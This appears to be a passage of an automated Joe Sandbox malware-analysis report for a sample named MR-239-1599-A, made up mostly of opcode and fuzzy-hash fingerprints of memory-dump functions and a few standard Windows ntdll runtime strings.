                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                                                                                                                          • Instruction ID: 555e804080827b6f718b9678cfae2ee0c3bf95fce0daffff18d8d03a5a3b6836
                                                                                                                                                                                                          • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                                                                                                                          • Instruction Fuzzy Hash: ECD01236100249EFCB02DF45C890D9A773AFBD8710F108019FD190B6508A31ED62DA50
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                                                                                                                                          • Instruction ID: 329d026fe91652ff348a81f27e6ae5a4c10dbef30c2256e83b000163f277a13f
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 93C0487AB01A428FCF1ADB6AD294F4977E4FB94784F150890E845CFB22E628E801CA10
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 02a354f79f191c966e15ce0be25a8035d521f75348af7ad78b6a543849ea0521
                                                                                                                                                                                                          • Instruction ID: c323b56f403ff6f9752b2ab2700d2ef3351c9b8c0288bdd06ac0a41e720f9e1c
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 02a354f79f191c966e15ce0be25a8035d521f75348af7ad78b6a543849ea0521
                                                                                                                                                                                                          • Instruction Fuzzy Hash: C9900231605800139140719948845464055B7E0315B59C411E0424954CCAA48A565361
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: f4febeecf214c4930ef8f911e08e696da65d10abe2c633287749708f550ab23b
                                                                                                                                                                                                          • Instruction ID: f50047e47c77d541b7eb2c73eefb1b1a16da2a25ae168c4a6e0a77cccbcd4ce3
                                                                                                                                                                                                          • Opcode Fuzzy Hash: f4febeecf214c4930ef8f911e08e696da65d10abe2c633287749708f550ab23b
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 49900271601500434140719948044066055B7E1315399C515A0554960CC6A889559369
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 06007ed5e3a84939cee37ba4cc5121b681a05e170c8112a3f5be1efbeedf1247
                                                                                                                                                                                                          • Instruction ID: fd81c184b0874b79f977930752d16889f444b59c2ad112786e460b355e67d4e1
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 06007ed5e3a84939cee37ba4cc5121b681a05e170c8112a3f5be1efbeedf1247
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4690023120140803D1807199440464A0055A7D1315F99C415A0025A54DCAA58B5977A1
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 6175f8feea7de8856f61c2a445d5ac3747fe6420a04689d5505595d3da4e2e9e
                                                                                                                                                                                                          • Instruction ID: 036ce1a6dd966aee52a1c6a3b1d0b52a94bbe56fa8d82eb0bfa3080ba3c7b94b
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6175f8feea7de8856f61c2a445d5ac3747fe6420a04689d5505595d3da4e2e9e
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8E90023120544843D14071994404A460065A7D0319F59C411A0064A94DD6B58E55B761
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: d81aa253b98fa63b477f070c4033deed2d5d4489191e805e4933a5c3ac818541
                                                                                                                                                                                                          • Instruction ID: 19b617ae98bbf0df9bf7fd00825d01c88d2b20690103d860956bae07d887d255
                                                                                                                                                                                                          • Opcode Fuzzy Hash: d81aa253b98fa63b477f070c4033deed2d5d4489191e805e4933a5c3ac818541
                                                                                                                                                                                                          • Instruction Fuzzy Hash: F590023120140803D104719948046860055A7D0315F59C411A6024A55ED6F589917231
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 83a46955bb0acfc151d13f9676a9f563efc29eeb8f8e97b580b9439e69a74159
                                                                                                                                                                                                          • Instruction ID: f908ee311bd6fcfed52e57a7b56da9796b1061568e0f9cfa0615b7b3ab8bb39b
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 83a46955bb0acfc151d13f9676a9f563efc29eeb8f8e97b580b9439e69a74159
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6B90023160540803D150719944147460055A7D0315F59C411A0024A54DC7E58B5577A1
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 9fe5c2fe96dec9caabea98e66f30e6450d94eac496fdf2cda14841c19b36be4c
                                                                                                                                                                                                          • Instruction ID: 1c1c2afdf506c9d129a9b74d3dbd84a34ee9a0dd5e4f122dd30305eb46387e7e
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9fe5c2fe96dec9caabea98e66f30e6450d94eac496fdf2cda14841c19b36be4c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: C2900235211400030105B59907045070096A7D5365359C421F1015950CD6B189615221
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 402d1644c45c924f89a26b335d7559d2ac552d9cea6222cc4b4525993a460b70
                                                                                                                                                                                                          • Instruction ID: 95a0af09c683ca062cfb412c7968e680535262b0ea08f97869aa9c8d5a14225a
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 402d1644c45c924f89a26b335d7559d2ac552d9cea6222cc4b4525993a460b70
                                                                                                                                                                                                          • Instruction Fuzzy Hash: FB900235221400030145B599060450B0495B7D6365399C415F1416990CC6B189655321
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: ad685b3fe7b8c576d276ec1ec1ac2625227382d8f9eb3ab67781d67ec4af613d
                                                                                                                                                                                                          • Instruction ID: 78782f19788c3f7e1000eed18759255f83b6f7039a562fdd364a2ba80f6ac7b5
                                                                                                                                                                                                          • Opcode Fuzzy Hash: ad685b3fe7b8c576d276ec1ec1ac2625227382d8f9eb3ab67781d67ec4af613d
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1090027134140443D10071994414B060055E7E1315F59C415E1064954DC6A9CD526226
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: b5b61f214211ada3021add0d96b104cf90938496e3db17d4d215bd6e0b11c212
                                                                                                                                                                                                          • Instruction ID: 9adfd2a064f5297968a69068b3a80f132995e9c106242f57530e26f4b68453f7
                                                                                                                                                                                                          • Opcode Fuzzy Hash: b5b61f214211ada3021add0d96b104cf90938496e3db17d4d215bd6e0b11c212
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 94900231211C0043D20075A94C14B070055A7D0317F59C515A0154954CC9A589615621
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 18be315293e0a1dd8456481df8cdf3588238bb87de599fdc2d90e921407ef1a5
                                                                                                                                                                                                          • Instruction ID: eb9de47e0962d3a14a74c55627b883d7e9013a7abb7890f94a69efbf85303ff8
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 18be315293e0a1dd8456481df8cdf3588238bb87de599fdc2d90e921407ef1a5
                                                                                                                                                                                                          • Instruction Fuzzy Hash: E590023120180403D1007199481470B0055A7D0316F59C411A1164955DC6B589516671
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 1a9451ef42e1ef4dad938c9c1abfd544d27ec15acb106dde997aa26a94c8d99a
                                                                                                                                                                                                          • Instruction ID: a279209b424742edd0cee0e85f44e9b6ea27438bde956b443f3a3c2030263e0f
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1a9451ef42e1ef4dad938c9c1abfd544d27ec15acb106dde997aa26a94c8d99a
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9090023160140043414071A988449064055BBE1225759C521A0998950DC5E989655765
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: e1ed03b5386589dcbf1176c2a0f5f95467f788f1ac29a029209509909b804678
                                                                                                                                                                                                          • Instruction ID: 5a4c67210972dbc836dedc3a37680cc28150c4adab42d8af3d141ba847c901c4
                                                                                                                                                                                                          • Opcode Fuzzy Hash: e1ed03b5386589dcbf1176c2a0f5f95467f788f1ac29a029209509909b804678
                                                                                                                                                                                                          • Instruction Fuzzy Hash: C290023120180403D100719948087470055A7D0316F59C411A5164955EC6F5C9916631
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 24ae8e01d709012f46d8fb035210a848a34f0badd6fee77263d89fd160c5b8d0
                                                                                                                                                                                                          • Instruction ID: 8d94845bbcc97e0b125d782bc69cc32a427e89d7b3416d57ded7426f1e6ce8c6
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 24ae8e01d709012f46d8fb035210a848a34f0badd6fee77263d89fd160c5b8d0
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4790023130140403D102719944146060059E7D1359F99C412E1424955DC6B58A53A232
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 2390413be828fbab6ea01272b3cf157719223b019192137d87e82dc79292c31e
                                                                                                                                                                                                          • Instruction ID: b73b4b48b427aa1d7af0b3639e826cb926349d654e64a3a6f27f7f8d5d53be1b
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2390413be828fbab6ea01272b3cf157719223b019192137d87e82dc79292c31e
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1390027120180403D140759948046070055A7D0316F59C411A2064955ECAB98D516235
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: e1b6231a22f835a49eb893427d98838ed7c8df845972175744e63479325e270e
                                                                                                                                                                                                          • Instruction ID: a844e6f76e7ebaef0266ec345ef665db80f016217284d01852bc1adf11dd466e
                                                                                                                                                                                                          • Opcode Fuzzy Hash: e1b6231a22f835a49eb893427d98838ed7c8df845972175744e63479325e270e
                                                                                                                                                                                                          • Instruction Fuzzy Hash: D890023160140503D10171994404616005AA7D0255F99C422A1024955ECAB58A92A231
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 0ee65da0206efe2c17017db66ff633b9e674e690819898d0f6c9c31d8e6c0b89
                                                                                                                                                                                                          • Instruction ID: 39f8054a37a0d0cbd5c30ba128a0e6e1febf8d840cb2866dc412f1602f485457
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0ee65da0206efe2c17017db66ff633b9e674e690819898d0f6c9c31d8e6c0b89
                                                                                                                                                                                                          • Instruction Fuzzy Hash: DF90027120140403D140719944047460055A7D0315F59C411A5064954EC6E98ED56765
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
Similarity
• API ID: ___swprintf_l
• String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
• API String ID: 48624451-2108815105
Strings
• ExecuteOptions, xrefs: 015646A0
• CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01564655
• CLIENT(ntdll): Processing section info %ws..., xrefs: 01564787
• CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 015646FC
• Execute=1, xrefs: 01564713
• CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01564725
• CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01564742
Memory Dump Source
• Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
Similarity
• API ID:
• String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
• API String ID: 0-484625025
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
Similarity
• API ID: __aulldvrm
• String ID: +$-$0$0
• API String ID: 1302938615-699404926
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
Similarity
• API ID: ___swprintf_l
• String ID: %%%u$[$]:%u
• API String ID: 48624451-2819853543
                                                                                                                                                                                                          • Opcode ID: 4357a65855549df2e8a7e012eb8ed47f57717bf4502ebea295dec351bafa1fe4
                                                                                                                                                                                                          • Instruction ID: 2d5e899af9ad49df5928a2f85ae21de12377ff13635c06f2915a8933bf41c518
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4357a65855549df2e8a7e012eb8ed47f57717bf4502ebea295dec351bafa1fe4
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1121777AE0011AABDB11DF79DC41AFEBBF8FF94644F440116EA45DB240E730E9018BA1
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 015602E7
                                                                                                                                                                                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 015602BD
                                                                                                                                                                                                          • RTL: Re-Waiting, xrefs: 0156031E
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                                                                                                          • API String ID: 0-2474120054
                                                                                                                                                                                                          • Opcode ID: 0f88172dd22b62deb2513a4d2e04862f568681756da955261790d0c5c9575d6f
                                                                                                                                                                                                          • Instruction ID: b3ebeed1ca959e17182d55fe4536d9b9309d6260f2e0cc5494d1f8ae4a3f67cf
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0f88172dd22b62deb2513a4d2e04862f568681756da955261790d0c5c9575d6f
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 33E19E706047429FE726CF28C884B2ABBE4BF84314F140A5EF5A58F2E1D774D949CB92
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01567B7F
                                                                                                                                                                                                          • RTL: Resource at %p, xrefs: 01567B8E
                                                                                                                                                                                                          • RTL: Re-Waiting, xrefs: 01567BAC
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                                                          • API String ID: 0-871070163
                                                                                                                                                                                                          • Opcode ID: b53a446e6b59e9b57feed54e1e64c216dfd000bbe5b63570f8e4701c0f37e689
                                                                                                                                                                                                          • Instruction ID: d1d1107dd7bd9dcab591447dc8de0f572799333bc683d4c098f051d131e2b7cf
                                                                                                                                                                                                          • Opcode Fuzzy Hash: b53a446e6b59e9b57feed54e1e64c216dfd000bbe5b63570f8e4701c0f37e689
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1741D1367007039FD724DE29C840F6AB7E5FB99710F100A1DE9669F290EB71E4058B91
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0156728C
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01567294
                                                                                                                                                                                                          • RTL: Resource at %p, xrefs: 015672A3
                                                                                                                                                                                                          • RTL: Re-Waiting, xrefs: 015672C1
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                          • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                                                          • API String ID: 885266447-605551621
                                                                                                                                                                                                          • Opcode ID: 53067f286c49fb6617f23d154c8e53575ded8ad05be73cf4ab0ca45317843eae
                                                                                                                                                                                                          • Instruction ID: 074bfb9df4aa7637b72d0769a334e396daa5e814e4c9006e95cbbf50b196546d
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 53067f286c49fb6617f23d154c8e53575ded8ad05be73cf4ab0ca45317843eae
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6A41C132700217ABD721DE29CC41F6AB7A5FB99714F100A19F955AF280DB31F8428BD1
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ___swprintf_l
                                                                                                                                                                                                          • String ID: %%%u$]:%u
                                                                                                                                                                                                          • API String ID: 48624451-3050659472
                                                                                                                                                                                                          • Opcode ID: 5af7d5680f36da9e87cf0743bd3bd80ee7924a6269954a5dc6a3cd3ebe8e7af7
                                                                                                                                                                                                          • Instruction ID: 4a7ed75a7cdd35dd2ffded56e4a0954b7a30b9ac73913458655ced0f9e91f28f
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5af7d5680f36da9e87cf0743bd3bd80ee7924a6269954a5dc6a3cd3ebe8e7af7
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 74316672A002199FDB20DE2DDC41BEE77F8FF55610F94455AE949EB240EB309A448BA0
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: __aulldvrm
                                                                                                                                                                                                          • String ID: +$-
                                                                                                                                                                                                          • API String ID: 1302938615-2137968064
                                                                                                                                                                                                          • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                                                                                                          • Instruction ID: 4d9628ccd1bf3f328409f9746c72f199db57eec9af04827c40cdf78f3cc01709
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                                                                                                          • Instruction Fuzzy Hash: E29185B1E002169FDB24DF6DC8816BEBBA5BFC8720F14461AE965EF2C0D73099409761
